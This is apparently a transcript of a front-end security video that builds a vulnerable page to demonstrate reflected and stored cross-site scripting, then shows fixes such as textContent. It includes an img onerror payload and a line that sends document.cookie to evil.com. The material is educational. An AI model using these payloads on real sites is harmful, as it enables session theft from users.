Hey everyone, welcome back. And in this video, let's just go ahead and explore a few things which we can do on front end, both in terms of breaking the app as well as securing the app from a security point of view. So I'm going to go ahead and create a very simple HTML and CSS playground, and I'm going to say this as XSS basics. XSS is an attack which stands for cross-site scripting. Cross, which is an X, and site scripting are the two S. Right? So this sort of attack, what this means is that you as an attacker is able to execute certain JavaScript on the page, but in some way you are able to execute it on the other user's end. So let me clarify what that means. Let's say this is your inbox, right? Although this is not your inbox, it's angryuse.codedamn.app, but imagine that my Gmail inbox is open here. Let's say I copy this link and send it to you, and your inbox gets opened. That is all fine and okay because, well, URLs are the same thing, right? You are also going to mail.google.com. I'm also going to mail.google.com. But let's say I give you a crafted payload over here in the URL itself, which when you copy paste, your inbox gets opened, but there's a special JavaScript which also gets run on the page, which might give me access to parts of your inbox or your complete inbox. That is done through XSS, which is cross-site JavaScript, which means that I was able to run certain code of JavaScript which I have written, not the website, I, the attacker, have written, and it got executed on your machine. So let's try to build a very simple app over here. Let's say I say over here, this app is named Greeter, right? And I just say this is hello, and then I just have a div ID name. And then over here, I'll just add the name of the person, whoever I want to greet. Now, the way this works is that I can go to the script tag and I can also have script src, script.js. I can go to the script tag, script.js, and I can go ahead and start working on a very simple app. I'm going to say that this over here is an input type text, and this says placeholder as enter your name. Right? An ID as name field, whatever, or just name. So what I want to do is whenever somebody enters their name and submits this form, it just puts their name over here inside this. So let's just go ahead and make this a little tidy. I'm going to throw in a button here as well, input type submit, value go. Right? So now what I'm going to do is I can go to this playground over here and I can enter my name as Mehul and hit OK, and you can see nothing really happens. I just reload and I don't have any parameters because this should also include the name property as name. Right? Now let's just go ahead and refresh this. Hello, go, and you can see that my URL gets constructed in the form of this. Now in order to build a complete app out of this, what I also have to do is I have to say that when the document loads, I have to get this parameter from the URL and then, just use it inside or show it inside this name. So I'm going to go ahead and write a piece of code which any developer would use. New URL search params, and I'm going to say window.location.search. This would give me access to the parameters, and I'm going to have, we could have this as search params, and this could be params, which would be object.from entries, and then I'm going to give search param.entries, right? So now if I console log my params, and if I refresh this page and open the console, you would be able to see that I have this object named as hello, right? So now if I go ahead and just say that if params.name, I want to show the name over here. I'm going to say document.getElementById as name, and I'm going to say .inner HTML is params.name, right? Now when I refresh this, you're going to see I'm going to go ahead and probably get element by ID. Okay, we have a duplicate over here, so let's just go ahead and drop this ID and let's just keep this. So now if I refresh this, you're going to see we get hello. I can also add it just right here so that it's in the same line, and move this. So now if I refresh this, I get hello hello. If I enter my name, hit go, you're gonna see I get hello Mehul. If I enter codedam, hit go, you're gonna see that we get hello codedam. But when you build this application, what you have done wrong is that you have done something where the output on your page gets reflected through the input from the user. The number one thing which I'll keep on repeating throughout this course is that whenever you are using user input, you're storing it, you are bringing it on backend, front end, wherever, you have to make sure that you consider that input as evil. Because any sane person, regular people would just keep on entering it like this. But anyone who has a malicious use, what they could do is they could start entering HTML over here like this. So see what I did over here is that in the name parameter, I inserted an h1 with a hello and then a closing h1. So the document it generated for me now was something like this. Hello, span ID name, and then h1 hello was written inside it. Now, what I could do technically is I could say script alert document dot location. Let's say I do something like this first. Hit enter. Now you see that nothing really happens because we are inserting this script as a dynamic element. Now again, this would have happened if this injection, this thing would have been done from the server side, but because we are doing it from the client side, nothing really happened. We did not get any alert, but there are ways to circumvent this. So I could say svg or img srcx on error alert document dot domain. So let's understand what I did over here, and let's see if it works in the first place. Okay, it works. So you see what I did. What I did was I inserted this as my parameter. Let's paste it over here. imgsrcx, which is just invalid. And then on error, I said that there should be a function which should run. And it is a piece of JavaScript code. So this embeds an image. It errors out because obviously X image does not exist. And it runs this error thing. Now the way I can exploit this is that I can say document.cookie. I can alert document.cookie. I don't have any cookies yet, but you might have cookies if you're using some banking website or anything. And I can just say something like location.href is equal to, https:/evil.com/get cookie and then plus document.cookie. So the moment I run this app, you can see I get redirected to evil.com/get cookie, and then there is nothing because obviously I don't have any cookies on that domain. But that is one way the user could just get your cookies, steal your cookies through an XSS attack. All they have to do is send you this particular link. You click on this link and you get hacked. So as a developer, what you can do over here in this case to prevent an XSS attack is to validate the input properly. And the kind of cross-site scripting attack which I mentioned over here, the XSS attack, this attack is known as reflective XSS. Your user input gets reflected in the output of the page. So this is a reflection. This is a reflection attack in XSS. There are different kind of XSS attacks. For example, let's say instead of name greeter, this was something like, just commenting, storing a comment or making a comment, just like we have on codedam.com/news. So if you go down over here, if you go down right here, I can leave a comment over here, right? So whatever I comment, nice article, for example, this gets stored and this gets displayed over here, right? Now, obviously we sanitize our input, but if we did not, what you could have done is script alert document.cookie or, local storage dot, some cookie access or something. And then you can serialize this and send it to your own location. And whoever visits this page would get hacked in a way. So this is also XSS because you are executing your own attacker JavaScript code, but this is stored XSS. That means you're storing a payload on the page in the database, which gets reflected over here. This is not reflected XSS because you're not using it in some sort of URL or something. So this is how this attack works. Now, how do you write a secure web app against this? Well, like I said, consider this input as evil. This input is super evil. So the first layer of defense you can use is you should never really manipulate the HTML of the page yourself, or based on the user's input. So never use inner HTML, use something like text content, because text content forces the browser to not parse the input as HTML payload. Now the moment you do that, and when I refresh this, you're going to see now we get the string as it is, as it should be. And this is because this thing which is getting inserted is now getting inserted as a text node on the page, not as just HTML node, right? So this was a quick fix for a reflective XSS attack, and there is probably no way you could bypass this, because whatever you do over here, even if you change the parameters, something like this, it'll not inject that as HTML content, which is the only reason your JavaScript gets hacked, right? So, well, this is the way to prevent an XSS attack from the front end itself. If this is getting injected from the back end, let's say you have to do it in an inner HTML fashion, what you can do is you can sanitize this input. And one of the ways to sanitize this input is using something like encode URI component. And if you go back, if you give it a refresh, you can see that it encodes the whole component in terms of how you would pass it in the UI, in the URL. It looks ugly, but it still gets the job done, at least in this case, where we don't want this to appear as a, as an HTML payload. So if you want to go ahead and do it as an inner HTML, that's the way you can do it. Or better is that you do it in a text content fashion, where it will reflect, it'll work without even you converting it into a bad looking string, right? So yep, that's basically it for the first video, for the initial front end video. We're going to be covering more such examples on this. That is all for this one. I'm going to see you in the next video really soon.